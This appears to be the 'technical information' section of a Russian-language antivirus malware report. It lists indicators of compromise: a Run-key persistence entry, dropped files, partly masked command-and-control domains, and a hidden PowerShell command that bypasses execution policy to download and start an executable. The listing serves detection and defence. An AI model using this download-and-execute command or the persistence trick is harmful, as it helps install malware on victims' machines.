Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'msnet' = '%APPDATA%\msnet\msnet.exe'
- http://sm###scope.info/look/emma2.exe как %appdata%\msnet.exe
- installutil.exe
- %TEMP%\abctfhghgdghghž.sct
- %APPDATA%\msnet.exe
- %TEMP%\installutil.exe
- %TEMP%\b35bc50e-fc56-4239-a7d0-bb79118b31c9\agiledotnetrt.dll
- %APPDATA%\msnet\msnet.exe
- %TEMP%\installutil.exe в %TEMP%\tmpg801.tmp
- 're####panel.co.vu':80
- http://sm###scope.info/look/emma2.exe
- http://re####panel.co.vu/emm2/inc/77338ec6e0ae4b.php
- DNS ASK sm###scope.info
- DNS ASK re####panel.co.vu
- '%APPDATA%\msnet.exe'
- '%TEMP%\installutil.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://sm###scope.info/look/emma2.exe','%APPDATA%\msnet.exe');Start-Process '...' (со скрытым окном)